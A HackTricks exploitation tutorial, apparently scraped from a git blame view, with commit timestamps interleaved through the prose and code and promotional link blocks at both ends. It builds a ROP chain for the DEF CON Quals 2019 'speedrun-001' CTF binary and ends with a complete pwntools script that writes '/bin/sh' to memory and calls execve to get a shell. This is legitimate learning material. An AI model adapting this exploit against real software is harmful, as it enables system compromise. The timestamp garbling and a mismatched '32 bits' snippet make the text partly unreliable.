2022-05-01 16:32:23 +00:00
2022-04-28 16:01:33 +00:00
< details >
2023-04-07 08:52:01 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > < a href = "https://twitter.com/carlospolopm" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- **Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
2022-04-28 16:01:33 +00:00
2022-12-05 22:29:21 +00:00
- **Share your hacking tricks by submitting PRs to the [hacktricks repo ](https://github.com/carlospolop/hacktricks ) and [hacktricks-cloud repo ](https://github.com/carlospolop/hacktricks-cloud )**.
2022-04-28 16:01:33 +00:00
< / details >
2022-05-01 16:32:23 +00:00
2021-09-25 16:33:43 +00:00
In order to prepare the call for the **syscall** it's needed the following configuration:
2020-07-15 15:43:14 +00:00
2021-09-25 16:33:43 +00:00
* `rax: 59 Specify sys_execve`
* `rdi: ptr to "/bin/sh" specify file to execute`
* `rsi: 0 specify no arguments passed`
* `rdx: 0 specify no environment variables passed`
2021-10-18 11:21:18 +00:00
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack).
2021-09-25 16:33:43 +00:00
2022-05-01 16:32:23 +00:00
# Control the registers
2021-09-25 16:33:43 +00:00
2021-11-30 16:46:07 +00:00
Let's start by finding **how to control those registers** :
2021-09-25 16:33:43 +00:00
```c
2023-04-09 10:25:01 +00:00
ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx|rax) ; ret"
2021-09-25 16:33:43 +00:00
0x0000000000415664 : pop rax ; ret
0x0000000000400686 : pop rdi ; ret
0x00000000004101f3 : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret
```
2021-11-30 16:46:07 +00:00
With these addresses it's possible to **write the content in the stack and load it into the registers** .
2021-09-25 16:33:43 +00:00
2022-05-01 16:32:23 +00:00
# Write string
2021-09-25 16:33:43 +00:00
2022-05-01 16:32:23 +00:00
## Writable memory
2021-09-25 16:33:43 +00:00
Frist you need to find a writable place in the memory
2020-07-15 15:43:14 +00:00
2020-11-28 20:05:01 +00:00
```bash
2021-09-25 16:33:43 +00:00
gef> vmmap
[ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
2020-07-15 15:43:14 +00:00
```
2022-05-01 16:32:23 +00:00
## Write String
2020-07-15 15:43:14 +00:00
2021-09-25 16:33:43 +00:00
Then you need to find a way to write arbitrary content in this address
2020-07-15 15:43:14 +00:00
2021-09-25 16:33:43 +00:00
```python
ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
```
2020-07-15 15:43:14 +00:00
2022-05-01 16:32:23 +00:00
### 32 bits
2020-07-15 15:43:14 +00:00
2021-09-25 16:33:43 +00:00
```python
'''
Lets write "/bin/sh" to 0x6b6000
2020-07-15 15:43:14 +00:00
2021-09-25 16:33:43 +00:00
pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
2020-07-15 15:43:14 +00:00
2021-09-25 16:33:43 +00:00
rop += popRdx # place value into EAX
rop += "/bin" # 4 bytes at a time
rop += popRax # place value into edx
rop += p32(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx
rop += popRdx
rop += "//sh"
rop += popRax
rop += p32(0x6b6000 + 4)
rop += writeGadget
```
2022-05-01 16:32:23 +00:00
### 64 bits
2021-09-25 16:33:43 +00:00
```python
'''
Lets write "/bin/sh" to 0x6b6000
pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx
2020-07-15 15:43:14 +00:00
```
2022-05-01 16:32:23 +00:00
# Example
2021-09-25 16:33:43 +00:00
```python
from pwn import *
2020-07-15 15:43:14 +00:00
2021-09-25 16:33:43 +00:00
target = process('./speedrun-001')
#gdb.attach(target, gdbscript = 'b *0x400bad')
2020-07-15 15:43:14 +00:00
2021-09-25 16:33:43 +00:00
# Establish our ROP Gadgets
popRax = p64(0x415664)
popRdi = p64(0x400686)
popRsi = p64(0x4101f3)
popRdx = p64(0x4498b5)
2020-07-15 15:43:14 +00:00
2021-09-25 16:33:43 +00:00
# 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
writeGadget = p64(0x48d251)
# Our syscall gadget
syscall = p64(0x40129c)
'''
Here is the assembly equivalent for these blocks
write "/bin/sh" to 0x6b6000
pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000)
rop += writeGadget
'''
Prep the four registers with their arguments, and make the syscall
pop rax, 0x3b
pop rdi, 0x6b6000
pop rsi, 0x0
pop rdx, 0x0
syscall
'''
rop += popRax
rop += p64(0x3b)
rop += popRdi
rop += p64(0x6b6000)
rop += popRsi
rop += p64(0)
rop += popRdx
rop += p64(0)
rop += syscall
# Add the padding to the saved return address
payload = "0"*0x408 + rop
# Send the payload, drop to an interactive shell to use our new shell
target.sendline(payload)
target.interactive()
2020-07-15 15:43:14 +00:00
```
2022-05-01 16:32:23 +00:00
# References
2021-09-25 16:33:43 +00:00
2021-11-30 16:46:07 +00:00
* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html ](https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html )
2022-04-28 16:01:33 +00:00
2022-05-01 16:32:23 +00:00
2022-04-28 16:01:33 +00:00
< details >
2023-04-07 08:52:01 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > < a href = "https://twitter.com/carlospolopm" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- **Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
2022-04-28 16:01:33 +00:00
2022-12-05 22:29:21 +00:00
- **Share your hacking tricks by submitting PRs to the [hacktricks repo ](https://github.com/carlospolop/hacktricks ) and [hacktricks-cloud repo ](https://github.com/carlospolop/hacktricks-cloud )**.
2022-04-28 16:01:33 +00:00
< / details >
2022-05-01 16:32:23 +00:00